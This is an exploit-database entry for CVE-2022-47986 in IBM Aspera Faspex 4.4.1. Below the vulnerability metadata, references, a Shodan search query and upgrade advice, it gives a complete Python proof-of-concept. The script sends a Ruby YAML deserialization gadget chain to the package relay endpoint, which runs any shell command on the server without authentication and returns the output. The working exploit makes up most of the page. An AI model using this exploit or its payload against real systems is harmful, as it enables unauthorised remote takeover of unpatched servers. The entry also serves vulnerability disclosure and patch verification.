IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)

vendor:

IBM Aspera Faspex

by:

Maurice Lambert

7.5

CVSS

HIGH

YAML deserialization

CWE

Product Name: IBM Aspera Faspex

Affected Version From: 4.4.2001

Affected Version To: 4.4.2001

Patch Exists: No

Related CWE: CVE-2022-47986

CPE:

Metasploit: https://www.rapid7.com/db/vulnerabilities/ibm-aspera-faspex-cve-2022-47986/

Other Scripts:

Tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/, https://www.ibm.com/support/pages/node/6952319, https://exchange.xforce.ibmcloud.com/vulnerabilities/243512, http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html, https://nvd.nist.gov/vuln/detail/CVE-2022-47986

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'html:"Aspera Faspex"', 'verified': True, 'vendor': 'ibm', 'product': 'aspera_faspex'}

Platforms Tested: Linux

2023

IBM Aspera Faspex 4.4.1 – YAML deserialization (RCE)

This file implements a POC for CVE-2022-47986 an YAML deserialization that causes a RCE in IBM Aspera Faspex (before 4.4.2).

Mitigation:

Upgrade to version 4.4.2 or above.

Source

Exploit-DB raw data:

# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
# Date: 02/02/2023
# Exploit Author: Maurice Lambert <mauricelambert434@gmail.com>
# Vendor Homepage: https://www.ibm.com/
# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
# Version: 4.4.1
# Tested on: Linux
# CVE : CVE-2022-47986

"""
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""

__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "mauricelambert434@gmail.com"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "mauricelambert434@gmail.com"
__description__ = """
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""
license = "GPL-3.0 License"
__url__ = "https://github.com/mauricelambert/CVE-2022-47986"

copyright = """
CVE-2022-47986  Copyright (C) 2023  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
"""
__license__ = license
__copyright__ = copyright

__all__ = []

print(copyright)

from urllib.request import urlopen, Request
from sys import argv, exit, stderr, stdout
from shutil import copyfileobj
from json import dumps

def main() -> int:

    if len(argv) != 3:
        print("USAGES:", argv[0], "[hostname] [command]", file=stderr)
        return 1
    
    copyfileobj(
        urlopen(
            Request(
                argv[1] + "/aspera/faspex/package_relay/relay_package",
                method="POST",
                data=dumps({
                    "package_file_list": [
                        "/"
                    ],
                    "external_emails": f"""
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "pew"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:PrettyPrint
             output: !ruby/object:Net::WriteAdapter
                 socket: &1 !ruby/module "Kernel"
                 method_id: :eval
             newline: "throw `{argv[2]}`"
             buffer: {{}}
             group_stack:
              - !ruby/object:PrettyPrint::Group
                break: true
         method_id: :breakable
""",
                    "package_name": "assetnote_pack",
                    "package_note": "hello from assetnote team",
                    "original_sender_name": "assetnote",
                    "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "metadata_human_readable": "Yes",
                    "forward": "pew",
                    "metadata_json": '{}',
                    "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
                    "delivery_sender_name": "assetnote",
                    "delivery_title": "TEST",
                    "delivery_note": "TEST",
                    "delete_after_download": True,
                    "delete_after_download_condition": "IDK",
                }).encode()
            )
        ),
        stdout.buffer,
    )

    return 0


if __name__ == "__main__":
    exit(main())